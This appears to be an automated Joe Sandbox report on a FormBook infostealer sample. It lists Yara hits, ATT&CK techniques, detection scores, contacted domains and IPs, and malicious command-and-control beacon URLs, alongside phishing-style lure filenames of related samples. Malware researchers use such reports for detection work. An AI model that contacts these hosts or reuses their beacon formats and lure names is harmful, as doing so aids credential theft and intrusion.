Source: Yara match	File source: 4.2.V5cfxBHd71.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 4.2.V5cfxBHd71.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.V5cfxBHd71.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection512	Masquerading1	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection512	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information3	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing3	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Timestomp1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
V5cfxBHd71.exe	29%	Virustotal		Browse
V5cfxBHd71.exe	30%	ReversingLabs	ByteCode-MSIL.Spyware.Noon
V5cfxBHd71.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.V5cfxBHd71.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Link
www.hazard-protection.com	2%	Virustotal	Browse
3cheer.com	2%	Virustotal	Browse
www.leonardocarrillo.com	1%	Virustotal	Browse
vectoroutlines.com	6%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.tiro.comFI	0%	Avira URL Cloud	safe
http://www.fontbureau.comFQ	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/9	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/:	0%	Avira URL Cloud	safe
http://www.fontbureau.comcom:	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/9	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
www.adultpeace.com/p2io/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/:	0%	URL Reputation	safe
http://www.fontbureau.comF5	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/ch	0%	Avira URL Cloud	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/f	0%	Avira URL Cloud	safe
http://www.fontbureau.comF:	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/)	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0	0%	URL Reputation	safe
http://www.fontbureau.comgrito	0%	URL Reputation	safe
http://www.fontbureau.comrsiv	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.fontbureau.comR.TTF	0%	URL Reputation	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/help5	0%	Avira URL Cloud	safe
http://www.fontbureau.comcomd	0%	URL Reputation	safe
http://www.fontbureau.comdy	0%	Avira URL Cloud	safe
http://www.fontbureau.co	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/C	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htmo	0%	Avira URL Cloud	safe
http://www.fontbureau.comueTFC	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.fontbureau.comd	0%	URL Reputation	safe
http://www.urwpp.debI	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/y	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.boogerstv.com/p2io/?BJ=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7jRLyNqpfuRL&b2Ml9=0txtgJLXY6ULB	100%	Avira URL Cloud	malware
http://www.fontbureau.com.TTF5	0%	Avira URL Cloud	safe
http://www.fontbureau.comm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.fontbureau.comalsFC	0%	Avira URL Cloud	safe
http://www.fontbureau.comals	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/f	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/nly	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/d	0%	URL Reputation	safe
http://www.vectoroutlines.com/p2io/?BJ=RfOK6jKhDkXNwKgMe5LTyAppaXreGCTFIz0prsbY2047Xu3Gxs4GQwDY2/SnNVlkbHQV&b2Ml9=0txtgJLXY6ULB	100%	Avira URL Cloud	malware
http://www.jiyu-kobo.co.jp/tion	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.hazard-protection.com	148.59.128.71	true	false	2%, Virustotal, Browse	unknown
3cheer.com	34.102.136.180	true	false	2%, Virustotal, Browse	unknown
parkingpage.namecheap.com	198.54.117.218	true	false		high
www.leonardocarrillo.com	172.107.55.6	true	false	1%, Virustotal, Browse	unknown
vectoroutlines.com	198.54.126.105	true	true	6%, Virustotal, Browse	unknown
mercuryaid.net	223.29.234.230	true	true		unknown
www.tpcgzwlpyggm.mobi	unknown	unknown	true		unknown
www.boogerstv.com	unknown	unknown	true		unknown
www.m678.xyz	unknown	unknown	true		unknown
www.kce0728com.net	unknown	unknown	true		unknown
www.mercuryaid.net	unknown	unknown	true		unknown
www.vectoroutlines.com	unknown	unknown	true		unknown
www.3cheer.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.adultpeace.com/p2io/	true	URL Reputation: safe	low
http://www.boogerstv.com/p2io/?BJ=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7jRLyNqpfuRL&b2Ml9=0txtgJLXY6ULB	true	Avira URL Cloud: malware	unknown
http://www.vectoroutlines.com/p2io/?BJ=RfOK6jKhDkXNwKgMe5LTyAppaXreGCTFIz0prsbY2047Xu3Gxs4GQwDY2/SnNVlkbHQV&b2Ml9=0txtgJLXY6ULB	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.tiro.comFI	V5cfxBHd71.exe, 00000000.00000003.236412505.000000000627E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.comFQ	V5cfxBHd71.exe, 00000000.00000003.243584347.000000000627F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/bThe	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersE	V5cfxBHd71.exe, 00000000.00000003.249525924.00000000062A9000.00000004.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/9	V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/:	V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comcom:	V5cfxBHd71.exe, 00000000.00000003.243584347.000000000627F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/9	V5cfxBHd71.exe, 00000000.00000003.238966135.0000000006273000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/:	V5cfxBHd71.exe, 00000000.00000003.238699786.000000000627D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comF5	V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	V5cfxBHd71.exe, 00000000.00000003.245511901.00000000062A9000.00000004.00000001.sdmp, V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/ch	V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://fontfabrik.com	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/f	V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/	V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designersb	V5cfxBHd71.exe, 00000000.00000003.243484955.00000000062A9000.00000004.00000001.sdmp	false		high
http://www.fontbureau.comF:	V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/)	V5cfxBHd71.exe, 00000000.00000003.238699786.000000000627D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0	V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comgrito	V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comrsiv	V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.de	V5cfxBHd71.exe, 00000000.00000003.243718619.000000000627E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	V5cfxBHd71.exe, 00000000.00000002.257959634.00000000031D1000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comR.TTF	V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	V5cfxBHd71.exe, 00000000.00000003.236794650.00000000062AE000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.galapagosdesign.com/	V5cfxBHd71.exe, 00000000.00000003.245350985.00000000062A9000.00000004.00000001.sdmp, V5cfxBHd71.exe, 00000000.00000003.246243890.000000000627E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/help5	V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlu	V5cfxBHd71.exe, 00000000.00000003.243233476.000000000627C000.00000004.00000001.sdmp	false		high
http://www.fontbureau.comcomd	V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comdy	V5cfxBHd71.exe, 00000000.00000003.242665214.000000000627F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.co	V5cfxBHd71.exe, 00000000.00000003.242605012.00000000062A9000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/C	V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htmo	V5cfxBHd71.exe, 00000000.00000003.245760419.000000000628A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comueTFC	V5cfxBHd71.exe, 00000000.00000003.243233476.000000000627C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comd	V5cfxBHd71.exe, 00000000.00000003.243718619.000000000627E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.debI	V5cfxBHd71.exe, 00000000.00000003.243718619.000000000627E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/	V5cfxBHd71.exe, 00000000.00000003.236344657.00000000062AF000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/y	V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	V5cfxBHd71.exe, 00000000.00000003.235839455.00000000062AA000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	V5cfxBHd71.exe, 00000000.00000003.242570041.00000000062A9000.00000004.00000001.sdmp, V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.html	V5cfxBHd71.exe, 00000000.00000003.243233476.000000000627C000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com.TTF5	V5cfxBHd71.exe, 00000000.00000003.243718619.000000000627E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers$	V5cfxBHd71.exe, 00000000.00000003.242288324.00000000062A9000.00000004.00000001.sdmp	false		high
http://www.fontbureau.comm	V5cfxBHd71.exe, 00000000.00000003.256705491.0000000006270000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers#	V5cfxBHd71.exe, 00000000.00000003.243369085.00000000062A9000.00000004.00000001.sdmp	false		high
http://www.fontbureau.comalsFC	V5cfxBHd71.exe, 00000000.00000003.243584347.000000000627F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.comals	V5cfxBHd71.exe, 00000000.00000003.243501826.000000000627F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/f	V5cfxBHd71.exe, 00000000.00000003.238699786.000000000627D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/nly	V5cfxBHd71.exe, 00000000.00000003.238699786.000000000627D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers:	V5cfxBHd71.exe, 00000000.00000003.242354981.00000000062A9000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/d	V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/	V5cfxBHd71.exe, 00000000.00000003.241133154.00000000062AC000.00000004.00000001.sdmp, V5cfxBHd71.exe, 00000000.00000003.240999247.00000000062A9000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/tion	V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
198.54.117.218	parkingpage.namecheap.com	United States	22612	NAMECHEAP-NETUS	false
34.102.136.180	3cheer.com	United States	15169	GOOGLEUS	false
198.54.126.105	vectoroutlines.com	United States	22612	NAMECHEAP-NETUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458773
Start date:	03.08.2021
Start time:	18:23:43
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	V5cfxBHd71.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/1@9/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 27.2% (good quality ratio 23.3%) Quality average: 69.2% Quality standard deviation: 34.6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 73 Number of non-executed functions: 54
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 20.82.210.154, 52.255.188.83, 131.253.33.200, 13.107.22.200, 13.88.21.125, 23.211.6.115, 23.211.4.86, 20.50.102.62, 173.222.108.226, 173.222.108.210, 40.112.88.60, 80.67.82.211, 80.67.82.235 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:24:46	API Interceptor	1x Sleep call for process: V5cfxBHd71.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.54.117.218	TNT Shipping doc.exe	Get hash	malicious	Browse	www.zawajalgos.com/m8uk/?XV=MTy09FK0DZb&xJB4=nPIao3MtkZZfKB1sMK+jBa6jiFKBTthlCTc/qxHBcyQb4+aqEw0YlfO52cL0KqdOdHaJ
	Dimensions and sizes for valves quotation.exe	Get hash	malicious	Browse	www.ukuleleintensive.com/gbwy/?k6Ad=hPDdBc6xjVVVKqTpS12Zj2KWY/xbJiOaJ1g8o8RJGjNB7GfntMGyz7zUvwO+2i9W7Ket&Vv_d=PrNDGXc
	PI for the order 20210407DTR001.pdf.gz.exe	Get hash	malicious	Browse	www.synth.pizza/3b4e/?QBZxT=7nopdd9xcT&a8q=1PeMpVR0bS4CVM3zcs5suMbyrMp2Y/RA6dgrMfA7ZoqktSfsEthxMaqEH9TPZZD2gzi2JG1zGQ==
	242jQP4mQP.exe	Get hash	malicious	Browse	www.galvinsky.digital/dy8g/?S8tT3n=K+H2wjnk8RqujiMAF6k6lUq9+zoJ+xpADfX0uiRvrYfx+zwl829klMm2N7W/QIPtbcnmYyz+UQ==&8p=SN6XYPXXpfCx
	eTWZtFRRMJ.exe	Get hash	malicious	Browse	www.boogerstv.com/p2io/?X48P0=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxb9s6RBL4M&NJ=6lvHNFHx
	ekeson and sons.exe	Get hash	malicious	Browse	www.activedevon.xyz/eo5u/?3flLi=3fixF&WDH4Z=gO4K5mHcn2QPYGRvxafNe+5p9r0cfSpdBn55FnpuS2mPyHUUFTjtXKJi1XneNJcm9Y4m6sLWag==
	Payment receipt MT103.exe	Get hash	malicious	Browse	www.blockchain-365.com/n86i/?3fDpH=scV3eC5LnrxmdTaZDMUbfdarjWOrUl17K3tFUIp30YFf7UyQTMB90CuHfsBJQ1LJ+yqs&Vjo=1bT0vz7
	cy.exe	Get hash	malicious	Browse	www.fundheros.com/zrmt/?6lux=9Kp3w7DCYJwNU8WsE17OQw23x7mujlthWWaTZWOKl7Ig6Bz27x2cp62T+P49v/mmqthg&Klh8a=p2JDfHUh1
	j5rXLljONk.exe	Get hash	malicious	Browse	www.g-cleanpartners.in/dlc/distribution.php?pub=mixinte
